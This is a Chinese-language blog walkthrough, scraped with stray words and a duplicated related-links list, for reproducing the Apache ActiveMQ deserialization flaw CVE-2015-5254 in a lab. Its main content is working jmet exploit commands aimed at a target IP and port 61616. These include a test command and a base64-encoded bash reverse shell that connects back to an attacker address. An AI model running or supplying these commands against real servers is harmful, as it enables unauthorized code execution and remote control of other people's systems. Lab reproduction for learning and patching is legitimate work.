ActiveMQ反序列化漏洞(CVE-2015-5254)复现
简介: Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0以前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
1.首先在kali里面执行如下命令:java
cd var/opt wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar mkdir external
2.输入:git
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120 61616github
注释:-Q指定队列消息名,-I指定JMS客户端,这里是ActiveMQ,-Y指定具体的命令,-Yp指定payload类型,其后分别是ActiveMQ所在机器的ip及工做端口shell
3.如今会给目标的ActiveMQ添加一个名为事件的队列,能够咱们经过http://192.168.199.120:8161/admin/browse.jsp?JMSDestination=event看到这个队列中全部消息
4.点击消息可触发命令执行
5.而后使用反弹shell的命令输入:java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTk5LjEwOS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.199.120 61616安全
前面是输入本身的IP后进行的编码 后面是输入被***者的IPbash
6.执行完之后会出现一个序号 而后再主页里面触发 在进行监听就能够了jsp
相关文章
- 1. 【漏洞复现】---- ActiveMQ 反序列化漏洞(CVE-2015-5254)
- 2. apache ActiveMQ反序列化漏洞(CVE-2015-5254)复现
- 3. ActiveMQ反序列化漏洞(CVE-2015-5254)复现
- 4. JAVA反序列化漏洞复现
- 5. shiro反序列化漏洞复现
- 6. Apache Shiro反序列化漏洞复现
- 7. Shiro-550反序列化漏洞复现
- 8. ActiveMQ 反序列化漏洞(CVE-2015-5254)
- 9. ActiveMQ反序列化漏洞(CVE-2015-5254)
- 10. 利用Vulnhub复现漏洞 - ActiveMQ 反序列化漏洞(CVE-2015-5254)
- 更多相关文章...
- • C# 排序列表(SortedList) - C#教程
- • C# 反射(Reflection) - C#教程
- • Flink 数据传输及反压详解
- • 算法总结-归并排序
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 【漏洞复现】---- ActiveMQ 反序列化漏洞(CVE-2015-5254)
- 2. apache ActiveMQ反序列化漏洞(CVE-2015-5254)复现
- 3. ActiveMQ反序列化漏洞(CVE-2015-5254)复现
- 4. JAVA反序列化漏洞复现
- 5. shiro反序列化漏洞复现
- 6. Apache Shiro反序列化漏洞复现
- 7. Shiro-550反序列化漏洞复现
- 8. ActiveMQ 反序列化漏洞(CVE-2015-5254)
- 9. ActiveMQ反序列化漏洞(CVE-2015-5254)
- 10. 利用Vulnhub复现漏洞 - ActiveMQ 反序列化漏洞(CVE-2015-5254)